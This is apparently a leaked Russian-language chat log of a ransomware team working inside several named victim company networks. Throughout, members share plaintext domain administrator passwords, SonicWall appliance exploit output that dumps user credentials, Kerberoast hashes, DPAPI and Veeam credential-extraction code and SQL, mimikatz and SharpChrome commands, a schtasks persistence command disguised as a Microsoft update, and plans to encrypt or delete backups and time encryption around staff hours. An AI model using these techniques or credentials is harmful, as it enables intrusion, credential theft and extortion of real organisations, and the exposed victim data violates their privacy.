или вопрос в том как удобнее это сделать?а можно подробнее))на тот хеш который у него были поменять потом обратнозайти под нимхоть 1qwerty1я искал конфиги, не нашел(ты можешь выставить пользаку нтлм хеш любого известного клиртекст пароля``
ну значит ищем клиртекст, плюс можно выставить пользователю свой хеш пароля и потом поменять обратно
```
я же вроде доступно написал.конфиги искали password plus'a самого?Под нужным пользователем не войти под ntlmи развертыванием у себязаканчивая полной выкачкой папки с клиентомвариантов мильенчто "нет"?  по рдп пробовали зайти где клиент стоит?
ну значит ищем клиртекст, плюс можно выставить пользователю свой хеш пароля и потом поменять обратнонет клиртекст от рдп а по нтлм не подключаетсянетрдп?клиент который в облако вроде шлет@user9 облако с веб авторизацией?с облачными - ищем вход в клауд и трем там - тут все просто
если затереть нельзя - значит нельщяну по нашей сетке пока ничего...
все компы прошарили, челы не оставляют в хроме\файлах пароли
есть Passwords Plus - там вроде пароли хранят но это облако и тоже хер достанешьНО с ними тоже можно повоевать, они бывают доступны черзе какой-то интерфейс и можно затереть все касеты, там в шкафу есть функция размагричивания даже иногда)это cold tape бекапысамое наверное сложное, а зачастую и нерешаемоеи у них обычно есть ВООБЩЕ ВСЕ что связано с ав/бекапами/каталогами серверовчаще все все это манагится 3-4-5 людьми даже в крупных сетяхГЛАВНОЕ и самое важное!
это изучение содержимого тачек/хоумдир/браузеров айтишниковтут только с наживным опытом с ними разберетесь как работать, по сути - видим что стоит иии... ну просто читаем доки...veeam, acronis, ironmount итдпрактически везде +- одинаковые бекапы используютсявообще, касательно бекапов@user9 да. вот пример бекапа епть
ну понял да, жава сжирает. решимтут 4 Гб макс2х24х4 плашки?Компы древниеугу16 гиг тотал?ддр2??????у нас ддр2 стоит по 4Г слотов больше нет. а у некоторых мать больше не поддерживаетага?
```
Acronis Backup 11.7 Management Console 11.7.50058
```хуже эксплорера на винде бл.
окей, по оперативке услышалМалинка быстрей работаетпонялжава ебучая жрет всеОперативыram кончается@user3 чего в конфигах не хватает? System Load что показывает? РАМ жрет?``
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
 * using CryptUnprotectData API
 * volatile cache: GUID:{de823842-69eb-4af0-a1b0-d6b9625b796f};KeyHash:883bc94ae7ab70b09830fab37259abfc3cdf7fc9;Key:available
 * masterkey : 51a6f051e98d0d633d79bacbb355e3a5712c4f8a14f31fe332bb587047635a22e19cce783bb6cf8927eb9b590159f059e069a26186ce651e3aba7db2481f04d1
Password:
```

```
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
 * using CryptUnprotectData API
 * volatile cache: GUID:{2539f04d-b7c0-487a-97d8-c818e2889122};KeyHash:003f69a0852d9f879bebbfe1aaad91d7fcac9b34;Key:available
 * masterkey : fa0ee6549e47088279eafd681cc050d2f5f15a2618d818c9f286532ceeef0c10aaf31c26d4d4a5d1e226380e383a8626fd1cbaf4d165e47a75791a809adb682a
Password:
```

:zany_face:Компы демонически виснут! Нельзя так просто взять и открыть браузер кобу и блокнот!
у вас сейчас три вроде, надо еще? если да - скажите какие сервера и сколько вам нужно` по необходимститак, господа, по вопросам

1. smb_login с кредами на ДК / net use на ДК / логин в аутлук или вебмейл (если привязана доменная авторизация) / ldap_login (https://github.com/lanjelot/patator) например пататором
2. Первая часть - рудиментарный LM hash, можете смело забыть про то что это такое у нас он был и будет всегда одинаков, вторая - NTLM hash, собственно тот который мы юзаем зачастую для авторизации
3. Будет позже, сможете задачи ставить через админку на декрипт хешей и брутфорс кипассов/доков/эксельников
4. https://github.com/0xthirteen/StayKit - тут описаны все техники закрепления и разделены по категорям и по уровню привелегий, детальнее тут и расписывать нечего, "уникальных" техник для виндовых систем нету уже годы. Есть альтернативные вещи типа вебшеллов на веб сервера (это aspx код который размещается на вебсервере, в данном случае IIS где "живет" функционльное приложение - чаще всего и удобнее заливать на эксчендж), есть IIS модуль. Пока остановитесь на stay-kit'e потоум что он дает понимание, в дальнейшем просто выдам вам удобный инструмент для закрепления просто через запуск dll
5. все что находится в сети - админят люди. ключ к получению максимально подробных даных об иследуемой ИС находится у админов/сетевых инженеров. Это и диграмы и доступы и все остальное. Определить облачные или taped бекапы можно только через них либо по косвенным признакам (сервисы/таски на критичных серверах, записи в ад итп)
6. вопрос некорректный. его не "нужно" делать, smb_pipe это по сути просто вид нагрузки который +- технически равен bind пейлоаду в метасплойте, используется для машин с ограниченями авторизации либо для машин не имеющих возможности дать отстук наружу по стандартному http(s)/dns/tcp протоколу, то есть jump psexec(_psh) 10.0.0.1 pipe это создание сервиса для бинд пайпа по которому потом подключится машина-инициатор
7. выдам билдер дл файлов
8. у вас сейчас три вроде, надо еще? если да - скажите какие сервера и сколько вам нужно
9. А что виснет? я не в курсе.```
192.168.100.240
192.168.100.238
192.168.100.248
192.168.100.237
192.168.100.245
192.168.100.230
192.168.100.219
192.168.100.228
````SPROUSELAW\administrator 1ylft1tmtS_6963`тут?датут?всё норм, отлагаломеня выкинуло из нового рокетане живаявозьмусесия живаябрать сейчас``
+] Checking URL https://50.233.57.77
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.0-14sv

[+] Leaking sessions to dump configuration.
     [+] Found: SessionID: P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck= userType: 1 userName: hemrick Password: HEcbccanal20201996 Domain: CANALBARGE
[Done with https://50.233.57.77, found 1 sessions
1
[+] Saving session data
[+] Trying session P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck=
[+] Saving config to ./Dumps/50.233.57.77/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data

[+] Finding users
[+] Found 209 users


[+] Finding AD credentials
[!!] Found Active Directory credentials
[+] AD creds :@10.0.10.12
[+] AD creds :@10.0.10.12

[+] Looking for LDAP domain creds
[-] No LDAP credentials found.

[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data

[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 115, 'name': 'net extender', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jhecht'}
``в впннет доступа``
1. https://50.233.57.77
2фа, в букмарках ничего нет, бэкап коды не работают
```
тут попробуйте добавить свой букмарк`1. https://50.233.57.77`
2фа, в букмарках ничего нет, бэкап коды не работают
 
`2. https://173.247.171.106` - #grantweber-com
есть доступ к насу и к ав, нет к сфере, искали везде, можем закрыть172.81.67.174 (retif.com) нет кредов от NASчто в работе из них (скиньте ип) и на какой стадии или по какой причине не в работе3 впна выдавалтак подскажитеотыхайдрузья очень поспать хочется, сильно завис сегодня
часика через 4 вернусь, если совсем отключит - лочьте без меня, вряд ли там сильно будет я бегло посмотрелзавтра скажи @tl1 он закажет новый и срешит этот если там беда)или домен новый, я хз)почините кобуу плзили 5 мин провесит, потом опять сбрасываету user4 сесии живы
при перезаходе в кобальт счетчик сбрасываету меня, вроде бы, с кобальтовским доменом проблемысписок всех ЛА со всех где сняли скинь в групуда, везде почти одинаковые и не катят на серверасо всех 10 сняли ЛА?10 +-а сколько пользовательских?и проверь просто net view на этот хоста на пользовательские ходит[ ](https://mediaeveryone.com/channel/general?msg=pRohhnJJx2iZKt2ct) а на пользовательские?в лс напиши новый паснет доступа на смену пароляну где пишет что у него есть доступ к шарам admin$ remote и тдс каких серверов?без домена вроде не пускали, но мы снимали пользователей с серверов, и там нет этого пользователя и его группа без домена?да
говорит что просто пользакsmb_login что говорит на эти хосты?а вы все хосты проверили?user8 нет, параметры не скажу, а контекст был микроадмина (nddevbernst)а какой контекст был на момент запуска и параметры?но ходит туда никакчто много где админ шарытам был выше выводuser8 запускал, все выходыне работал лола вы до этого не запускали?там 20500 пк)Invoke-ShareFinder работает, но туговиднодомен видно?``
beacon> execute-assembly /home/user/TOOLS/2/SharpShares.exe shares
[*] Tasked beacon to run .NET program: SharpShares.exe shares
[+] host called home, sent: 117815 bytes
[+] received output:
[*] Parsed 0 computer objects.

```
С этим можно что сделать?даесли что, хэши от инвея побрутить можно?))**умер от ожидания**сесий не будетожидает файла в сис32 директории и запрещает его удаление``
The "poc.exe" simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)
```вот это я как раз не понял, вроде бы он перемещает дллку в сис32 и poс.ее запускаетили это способ не только перемещения, но и запускат е наш пользак становится ЛА на это файла и дает возможность сделать запуск из под админау нас права на доступ только в этому файлу и всенет, ну она там лежит, хорошо, мы запускаем то е под юзером без правнаоборот т е он дает тебе права юзера если ты админ?))[ ](https://mediaeveryone.com/channel/general?msg=SbqzTPKW2M9FeShdA) а не наоборот?а в данном случае мы имем права на запуск именно нашего файла из этого путисуть в том, что этот сис32 лежит в шаре admin$ а если ты имешь туда доступ, то это дает тебе админ права/системуЭто понятно. Но как я понял весь смысл этой движухи засадить свой файл в истем32 без прав. А дальше этот факт уже надо как то использовать. А вот как не понятно. Вроде от туда можно запускать приложения на которые UAC не ругается, но я не уверен)т к по статье автора, когда цикл ntuser.pol отрабатывает он удаляет файл из систем32ну суть его в том, что он мониторит когда файл создается и запрещает его удалениену дасмущает poc.exe?[ ](https://mediaeveryone.com/channel/general?msg=E8XQ2yp8EmqGYw4xB) на сколько я понял она очень простая, но могу ошибаться[ ](https://mediaeveryone.com/channel/general?msg=sHoWE5nicZ62h7BrQ) ну это сейчас есть, а в новых сессиях не факт)Ну и реализация несколко туманная)Почитал, но у юзаков на компах такого ненашел. Да и система везде есть[ ](https://mediaeveryone.com/channel/general?msg=a7JZYiR6HocfAtrhj) кто нибудь проверил?пока так же на 10 +-[ ](https://mediaeveryone.com/channel/general?msg=KAc6NFyvxPs9ZcrNy) текущие пользаки никуда не ЛА?[ ](https://mediaeveryone.com/channel/general?msg=uWyh8hz2oxQYBmsQM) с какой?кстати а что с авой ?Примерно в какое время?всё так же, никак не можем достать ДА и не можем на интересующие нас тачки попастьтак что у нас по текущим сеткам?ага окейда, неделю назад +-я же вам всем раздал новые кобы?время чуть позже скажуновые сесии сегодня будут дапонялон туту 3 опять комп выеб...те кто в сети у меня сейчас4 7 9user8 приболел4)у меня рокет лагает или вас всего 3 сейчас?ПриветВсем приветпо новым сейчас уточню - пока со старыми давайте дорабатыватьЕсть старая не знаем куда сунутьсяДа, пока в старых. Новые будут?всем привет)
есть сессии с чем работать?.Приветточнее изменен[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=Jt67LB3EmuYsCRw7w) .[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=bdH8rCxfysTudq6WW) ты тогда сказал битый)такая же фигня была с паролембыл случай не помню в какой сетитогда он не битыйОн же``
execute-assembly /home/input0/Cobalt/tools/Ghostpack-CompiledBinaries-master/SharpChrome.exe logins /pvk:C:\ProgramData\ntds_capi_0_93f29a7d-eed3-4c1f-99bf-ebeb7603cd2d.keyx.rsa.pvk
```4 сценарийhttps://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=LscPbvhi5ygophcfK) не понялмб устарелвряд ли снимается кривомб дпапи год мод?Все что естьи хромом и хромиумом?Есть пользак который ходит но пароль не снять выше я скинул как он снимается кривоъ
```
https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$??c$C?
```ай блять[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=2MeFgAscWkyBk65Jc) он в облаке``
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;

namespace Main
{
internal static class Program
	{
	private static void Decrypt(string b,string a){
		if (string.IsNullOrEmpty(a))
		{
			return;
		}
		byte[] encryptedData = Convert.FromBase64String(a);
		Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine)));
		return;
	}
	private static void Main(string[] args)
		{
			Decrypt("bakkeOffice","AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAGyv+yhssxEaNJF2obQfCSwQAAAACAAAAAAAQZgAAAAEAACAAAADMbPI8UL6dI5ivLmmtbfPselp0losssqbnFyWIqg29eAAAAAAOgAAAAAIAACAAAACnK/tIFTdbgO3ok5+WFnVl/d/uIE8YgcLB4YG5seXZVxAAAABLnxZoyMe7WVmWzeeRMB4CQAAAAIoDxg8RrE5TlSrxAt7CBh+arMdVWKWT0SCoWio0nUMPFXBBSP5NQ0tWZd5V8r6WzOqKWVYWOHBBocQR61bQx98=");
		}
 }
}
``````
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,49264 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
```с виамом есть?доступ на серверв группу ремоте десктоп усерс добавленпокачто наашли только у одного пользакау других снимали?Хотим попасть по рдп что б креды глянуть от вима. Увы не пускает``
    BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?!?
    BALLYMOREGROUP\CITAdmin L0ndonT0w3r2009!
    BALLYMOREGROUP\bespadmin drithEyuDAZ07ac
    BALLYMOREGROUP\nreid D0niford1259!
нужна новая кобанет, не нимали
я нашел креды и от да
и доступы к
и доступы на сервера где сидят ДА и дамины, но креды менялись месяц назад, а те что есть - устарели(lsadump::cacheнет я про mscache?
```
mimikatz vault::cred
``ты про vault?mscache дампали?)файлов logins signon тоже нетна пкя смотрю другой фа обнова ф выходит раз в месяц7 мес назад обновлен вродеа модуль который вы используете какого года?ребятда нет вроде использует``
 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 11/30/2020 14:48:14 bookmarkbackups
          dir 11/30/2020 14:45:10 crashes
          dir 11/30/2020 14:55:45 datareporting
          dir 11/30/2020 14:44:13 gmp
          dir 06/17/2020 20:55:20 gmp-eme-adobe
          dir 06/17/2020 20:55:21 gmp-gmpopenh264
          dir 06/17/2020 20:55:25 gmp-widevinecdm
          dir 06/17/2020 20:53:51 minidumps
          dir 11/30/2020 14:55:45 saved-telemetry-pings
          dir 11/30/2020 14:55:45 sessionstore-backups
          dir 06/17/2020 20:54:19 storage
 24b fil 06/17/2020 20:54:14 addons.json
 0b fil 11/30/2020 14:55:45 AlternateServices.txt
 238kb file 01/25/2017 11:52:36 blocklist.xml
 64kb file 11/30/2020 14:55:45 cert8.db
 208b file 11/30/2020 14:44:08 compatibility.ini
 967b fil 06/17/2020 20:54:15 containers.json
 224kb file 06/17/2020 20:54:10 content-prefs.sqlite
 512kb file 11/30/2020 14:55:45 cookies.sqlite
 185b file 06/17/2020 20:54:09 extensions.ini
 5kb file 06/17/2020 20:54:13 extensions.json
 192kb file 11/30/2020 14:47:14 formhistory.sqlite
 16kb file 11/30/2020 14:55:45 key3.db
 3kb file 06/17/2020 20:54:17 mimeTypes.rdf
 0b file 11/30/2020 14:44:08 parent.lock
 96kb file 06/17/2020 20:54:07 permissions.sqlite
 10mb file 11/30/2020 14:55:45 places.sqlite
 3kb file 11/30/2020 14:44:19 pluginreg.dat
 9kb file 11/30/2020 14:55:45 prefs.js
 15kb file 11/30/2020 14:44:26 search.json.mozlz4
 16kb file 06/17/2020 20:54:07 secmod.db
 288b file 11/30/2020 14:55:45 sessionCheckpoints.json
 878b file 11/30/2020 14:55:45 sessionstore.js
 598b file 11/30/2020 14:55:45 SiteSecurityServiceState.txt
 512b file 06/17/2020 20:54:18 storage.sqlite
 29b file 06/17/2020 20:53:51 times.json
 96kb file 06/17/2020 20:55:27 webappsstore.sqlite
 257b file 11/30/2020 14:55:45 xulstore.jso
``дайте листинг профиляможету него, возможно, в мозиле нет сохраненых входовнадеюсь со свежей головой быстро с утра порешаем с мозилой, чето сегодня не получается нифигаесли у вас проблема со снапшотами завтра не сможем начатьмы завтра заканчиваем?у вас тут что?так ребятпрофиль лежит аппдатаесли у него активная сессия туда есть вы сразу поймаете еехм, щас+ историюполучите его сохраненые паролида, и расшифроватьи на локальном дедике воткнуть его профиль под соксомвсе просто, надо забрать папку самого профилялегчайшемозиллаесть мозила, ну и эдж с эскплореромэто хорошохрома нетвидно, пытаюсь посмотреть что в фса c$ видно?rpc is unavailableytnрпс работает?[ ](https://mediaeveryone.com/group/gophersport-com?msg=6JavGHLQrPMDzWvsG) обманул)) только псэкзек работаетвмик же вы сказалипрограмфайлсписок процессова как узнать?[ ](https://mediaeveryone.com/group/gophersport-com?msg=b5o5shtSzFkKDFgmQ) -веб браузеру негокакой[ ](https://mediaeveryone.com/group/gophersport-com?msg=is74ecCBrPYSLJtXx) ?тогда ответье на вопрос который я задал час назадне в комманде дело. другой арм так притянули[ ](https://mediaeveryone.com/group/gophersport-com?msg=bBQffPSigsmYun92B) `shell SCHTASKS /Create /S 10.22.0.13 /u gophersport.local\schtask /p rehpog2013! /tn "OnDemand checking" /tr "cmd.exe /c rundll32 c:\windows\system32\shc.dll entryPoint" /sc onstart /RU SYSTEM`дл которую ты скрафтил, вроде работает но сессия оч быстро умираетпример командыадминскую тачку не получается притянуть. винрм и вми и псэкзек вроде отрабатывают но сессия не прилетает. штаск отключен походу `ERROR: The request is not supported.`так у вас тут что?так что браузер мы еще не видели дажекакой у него браузер?мы на армы не можем попасть и на админские тожеу него в браузере?сферу нашли, а кредов нетнашли таки?еще есть нюанс с всферой, пробуем к админам на комп попастьпереходим к работе к коллегамесли тут на 100% во всем увереныбэкапы, виртуализация, ав и прочеену тогда ваще супер)у вас по сети все?билд естьуже все готовотогда надо сегодня подготовить, чтобы завтра не ждатьокейтогда думаю 6 хватит``
-size[10/15/20/25/30/35/40/45/50/60/70/80]
Этот параметр определяет сколько % файла будет шифроваться(по умолчанию 50%), файл шифруется в разных местах кусками.
При этом базы данных шифруются на 100%, файлы вм на 20% не зависимо от значения параметра.
```[ ](https://mediaeveryone.com/group/gophersport-com?msg=AGh5J9zT3mu5jWym3) ага щасможет в курсенапиши ему в лс[ ](https://mediaeveryone.com/group/gophersport-com?msg=Jxbh8z9YRoGiBPS8y) @tl2 может в курсе?у меня есть сомнения на 6 часов`Shares for 10.2.1.21:
	[--- Unreadable Shares ---]
		IPC$
	[--- Listable Shares ---]
		RAID1 ServerHD SSDRAID2 TIF Archive Web schtask
`и принцип не знаю[ ](https://mediaeveryone.com/group/gophersport-com?msg=GeZ52s9MFa6iZRmSy) еще нас, один как минимум, есть[ ](https://mediaeveryone.com/group/gophersport-com?msg=Fr5YK8iryrRrbKw4S) думаю зависит от мощности окружения где запущен как миниумно я там толком не разобрался что та к чемутам 2 диска получается крупныхвижу у вас 2 меткивроде проценов 40ты когда смотрел через гуй там сколько ползунок был?билд же скорее всего большие файлы не полностью шифрует?опять таки там не весь объем данныехватит ли 6 часов``
 Volume in drive L is DRnetapp02a
 Volume Serial Number is 802E-2DBA

 Directory of l:\

06/08/2020 03:53 PM <DIR> Backups
04/22/2016 10:00 AM <DIR> VeeamWAN
               0 File(s) 0 bytes
               2 Dir(s) 2,537,787,944,960 bytes free

``ну хзхз2tb)``
[+] received output:
 Volume in drive L is DRnetapp01a
 Volume Serial Number is AA21-9C34

 Directory of L:\

06/09/2020 09:00 PM <DIR> Backups
05/09/2019 01:49 PM <DIR> ProgramData
10/24/2016 08:24 AM <DIR> VeeamWAN
               0 File(s) 0 bytes
               3 Dir(s) 2,094,574,211,072 bytes free

``или кая там меткадай dir Z:\давай)давай перед закрытием проебывать не будем)не стоитя помню, щас по рдп зайду посмотрютб+?сколько там объем диска?мне кажется за 6 часов можно вообще дохера файлов потрогать6 часов на весь процесну еще лучшевроде получается 2 часа ночи в 11да нетThe current time is: 9:50:34.39дай еще разок время оттудак вроде в наших 11 у них 11 вечера будет или где то такчтобы бэкапы прошлизавтра рано утром придется начатьесли на то пошлоагав любом случае чек сервера на авможет это он...ну я думаю еще виндэф рубануть перед началомскорее всего с них будут только сессии остальноые в мапвот посмотрите сколько без ав)`[+] No EDR products found! Operate at your own risk!`едр посмотрите там где пробовалину. я помню. он сегодня отвалился как разпотому что я сам его притягивал))хм, принт притянулсяего попробуйтетакой сервер там естьz1printтогда - не работаетс двумядлл с флагом стэй?и дл проверьтедак мы и так продолжаем искать)у вас есть шанс все проверить потому что завтра уже не будет времени на это)не факт что естьда вот хз. я думаю это виам там хранит. а гпервизоров их вообще ни видатьу нас получается виртуализация хранит снапы на том диске?чтобы проверить что она работаетдля начала 1-2 сервера притяните в кобу через дллесли с ней разберетесь можно было 2 закрытьтам еще одна сеть на подходено не просто сидеть и ждатьпришлось до 2-3 ночида)у них 9 утра, только начался рабочий день)тоже вариантдавай тогда завтра сутра и начнем?)тут без вариантовугу)бля это опять ночью закрывать будем?если начнем под носом админов они просто все ребутнут и этот диск на овердофига гб даже на половину не зашифруетсямы щас все равно не начнем у них рабочий деньближе к началу выдама билд?лучше в шифря локально пересоберу точно рабочий вариантдавай шелкодмы в старойкоба 4.2 завелась? или вы в старой работаете? или вобще через впн?щас скинуя конечно не на 100% уверен, но выглядит это как диск подключенный к виам уан.[ ](https://mediaeveryone.com/group/gophersport-com?msg=zs9ACCiTbycvsjNsy) если сторонняя инфа имеется то не стоитможно попробоватьесть предложение его форматнуть и дефрагментиваротьтам весь диск это бэкапы?The current time is: 9:11:35.49скажи мне там еще время сейчасга
тогда в шифрвиндакакая ОСа диски опять таки лежали где?но такой объем будет долго шифроватьсявсегоскорее всгеоя так думаю лучше пошифровать, а то удаленные можно восстановитьконечно)у нас доступ к этому диску ест ь?там интересная система - есть такая хрень veeam one называется. я в ее админку залез, поспотрел что как и нашел два сервака у которых диском Д (условно) подключены винты на дохера гигабайт и вот на них и лежат бэкапы[ ](https://mediaeveryone.com/group/gophersport-com?msg=eYeeFtaRDpCZgE3Qy) сканеры не дремлют)а они где лежат?ага, вспомнил... бэкапы виртуалок мы нашл, а вот что лучше удалить их, или пошифровать?в мсфвпска кстати тоже паленая походу, постоянно левые сесси прилетают и отваваютсяну в мою новую кобу вообще ничего не летит)но скорее всего щас выдам 3 кобы на 4.2решаю вопросвозможно кобы паленые - поэтому..ну трендмикро не такой и кусачийдругое дело)`[+] Trend Micro Inc Found!`ну точно же))он могет и в ремот смотретьа зач?так не на одну арму не зайти..а edr_query что говорит?может на новые кобы пропустит...на армах, стоит что хер пойми что, режет сессии только в путь[ ](https://mediaeveryone.com/group/gophersport-com?msg=A5hdqvaiMJhC3JSm2) а, это да[ ](https://mediaeveryone.com/group/gophersport-com?msg=dD7JqrCAaEKriCqkx) я про этонет sharsharesсерьезно? шарпснайпер сработал?```
Administrator backup erictitchenal
ilssql mattpeterson o365sync
schtask symbackup trackit
veeambackup veeamone watchguard



User: erictitchenal - IP Address: 10.22.0.10 (r90sflx3)

User: mattpeterson - IP Address: 10.22.0.13 10.10.0.54 (itvm1) (z1ftp)
``````
gophersport.local\schtask rehpog2013!

gophersport.local\symbackup rehpog2013!

gophersport.local\veeambackup rehpog2013!

gophersport.local\veeamone KA7KYbbmDC5LMmn
```зайди пока к @user4 тогдапроверь настройки листамы так и делалиага, дозапускались, что сесии отвалисья тебя так и запускалтак закинь его дллчет не летят сесии от user4а ты для @user9 не можешь заспавнить сессию, как мне делал?сейчас уточню времяпока готовых больше нет23.106.160.195 моя)``
CobaltStrike C2s on Port 443 - Pastebin.com
pastebin.com ' ...
34.233.187.38. 54.74.109.48. 209.159.207.46. 197.248.104.2. 152.160.171.27. 98.143.95.83. 64.139.73.173. 23.106.160.195. 205.201.245.170. 201.35.17.221.
```мне тоже наверно дай, а тоже процентов 20 притягиваетсялсно 4.2естьагатвоя?)ну и +)Есть читсые кобы?
моя видимо засветилась, не летят сессииuser9+Отпинговал серваки и армы. Нашел бэкапы. АД перснять не получается даже на ДК, но там, в основном, ничего не поменялось. Остается выяснить, что с виртуализацией, рассортировать серваки и можно закрывать - поэтому закажи билд, может сегодня и закроемда, тут уже все готово к след стадии)та я же дисинк снял)тут вон я скуль админа скинул
там стопудово ДА будет где-нибудь на скуль сервакетут уже вылез за пределы входной точки и хорошочем больше соберете себе пул работы на потом тем лучшеладноты пока сетку разбери до состояния ДАмы закрывать не будем``
kbhost2.korbel.com ESXI 5.5
kbhost1.korbel.com ESXI 5.5
colohost2.korbel.com ESXI 5.5
kbhost3.korbel.com ESXI 5.5
colohost1.korbel.com ESXI 5.5
kb-hqucs1.korbel.com Virtual Host Servers
vcenter.korbel.com VCENTER
``+ ав[ ](https://mediaeveryone.com/group/korbel-com?msg=xkdmqByZWcpbzcnan) да я пока креды сферы поищу``
$krb5tgs$23$sqladmin$korbel.com$MSSQLSvc/cognos2.korbel.com:1433$D6DDE7C0F99FCB13756285792EDA8ED3$19E792F0EFBA2B8C610528E69BD9AC8C6B08DB6328CFEF7727663276554C5A684D19AFFAE9B504DE89A500C8568987D17416CAECE119DF76ED6015480C3134042282134DFD9DBE2269F4C51C145BF58959A9C196A7F7737E70A867E6CA31E86812D44A7B392C007498BF83C3A34CF51C33B8D2900FA269B407C517E1FA4CC6FA474CE5F7E1CE0FA181B3BEECB1AC8C4740FF1044DAF8D6B2F2E7B2B13E2F4ED3B56F2118C0ABDDE393975F88FA099737CAC9021F3F1455BB3820A24317338774BD191F20DAD739A69387EEE72CD8451595303892DE8A0E2E9CFE7846330968B348D71737E272259EAF26737D536AC4A7B1021F0D9C8B3AE69EB27877311E4AB605876769263CC627649BA885B37A08A52FDD5D69040AEAAADB4E0B16C6A263666A72248B47C404855C874563A837BDAB7AF4C7066F6DCDA99D46A77EA9F5B228ABCAA100B33950CBD38C84EEA836362694C9D5DA0D06C134C1567AE79F0AF813D8564050EB083600D01E94453FC93E50CFFB13FC9E90B312EA43EC36C0F81D54B6F79B9B41D994AB38F8A1D1390F1C370EC2CF01089FBCEF031302F0AD3A9078636E158BF7F70FD51B796713A8F1704A545DB5B0629CFBFF9F314279A31E615281DFFCB70504379F0BD7792DA8940B222E9662AA32D245218C05A038D930BFB093D6A18D6A22BE91571EF775E74rfvbgt5
```можешь пока взять еще сетку в работезабери ток хешидавай)ок, пока сетку буду разбиратьну если бы не затупил, то на 3 минуты)да ладно как видишь делов на 3 минуты:skull_crossbones:молодецвседаэто уже новый да?```
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 12/21/2020 1:00:00 PM Ready
AM Transformer Cube Builds 12/22/2020 6:00:00 AM Ready
Microsoft SvcRestartTask#23731 12/21/2020 12:56:24 PM Ready
``сделал?)и штаском под системоймаскируешь под каноничное имяв систем32 прячешьстарый дл удаляйудаляй этот штаск на той машинеизвиния тут тоже вспылилладнона серверепросто голова плывет, соряни из юзеро дирыона под юзероместь то естьокудаляй штаск``
Microsoft autoupdate#94110
```есть``
Microsoft autoupdate#94110 12/21/2020 12:51:30 PM Ready

``длка рандлом запускается и осздает сама таску``
Folder: \
TaskName Next Run Time Status
======================================== ====================== ===============
Adobe Acrobat Update Task 12/21/2020 1:00:00 PM Ready
AM Transformer Cube Builds 12/22/2020 6:00:00 AM Ready
Microsoft autoupdate#94110 12/21/2020 12:51:30 PM Ready

Folder: \Microsoft
TaskName Next Run Time Status
======================================== ====================== ===============
INFO: There are no scheduled tasks currently available at your access level.

Folder: \Microsoft\Configuration Manager
TaskName Next Run Time Status
======================================== ====================== ===============
Configuration Manager Health Evaluation 12/22/2020 12:09:37 AM Ready

Folder: \Microsoft\Microsoft Antimalware
TaskName Next Run Time Status
======================================== ====================== ===============
Microsoft Antimalware Scheduled Scan 12/26/2020 2:00:12 AM Ready

Folder: \Microsoft\Office
TaskName Next Run Time Status
======================================== ====================== ===============
Office 15 Subscription Heartbeat 12/22/2020 6:33:22 AM Could not start

Folder: \Microsoft\Windows
TaskName Next Run Time Status
======================================== ====================== ===============
INFO: There are no scheduled tasks currently available at your access level.

Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
TaskName Next Run Time Status
======================================== ====================== ===============
AD RMS Rights Policy Template Management Disabled
AD RMS Rights Policy Template Management N/A Ready

Folder: \Microsoft\Windows\AppID
TaskName Next Run Time Status
======================================== ====================== ===============
PolicyConverter N/A Ready
VerifiedPublisherCertStoreCheck N/A Ready

Folder: \Microsoft\Windows\Application Experience
TaskName Next Run Time Status
======================================== ====================== ===============
AitAgent 12/22/2020 2:30:00 AM Ready
ProgramDataUpdater 12/22/2020 12:30:00 AM Ready

Folder: \Microsoft\Windows\Autochk
TaskName Next Run Time Status
======================================== ====================== ===============
Proxy N/A Ready

Folder: \Microsoft\Windows\CertificateServicesClient
TaskName Next Run Time Status
======================================== ====================== ===============
SystemTask N/A Ready
UserTask N/A Ready
UserTask-Roam Disabled

Folder: \Microsoft\Windows\Customer Experience Improvement Program
TaskName Next Run Time Status
======================================== ====================== ===============
Consolidator 12/21/2020 6:00:00 PM Could not start
KernelCeipTask 12/24/2020 3:30:00 AM Ready
UsbCeip 12/24/2020 1:30:00 AM Ready

Folder: \Microsoft\Windows\Customer Experience Improvement Program\Server
TaskName Next Run Time Status
======================================== ====================== ===============
ServerCeipAssistant 12/22/2020 1:56:36 PM Could not start
ServerRoleCollector 12/24/2020 12:54:11 AM Ready
ServerRoleUsageCollector 12/22/2020 7:21:00 PM Could not start

Folder: \Microsoft\Windows\Defrag
TaskName Next Run Time Status
======================================== ====================== ===============
ScheduledDefrag 12/23/2020 2:29:46 AM Ready

Folder: \Microsoft\Windows\MemoryDiagnostic
TaskName Next Run Time Status
======================================== ====================== ===============
CorruptionDetector N/A Ready
DecompressionFailureDetector N/A Ready

Folder: \Microsoft\Windows\MUI
TaskName Next Run Time Status
======================================== ====================== ===============
LPRemove N/A Ready

Folder: \Microsoft\Windows\Multimedia
TaskName Next Run Time Status
======================================== ====================== ===============
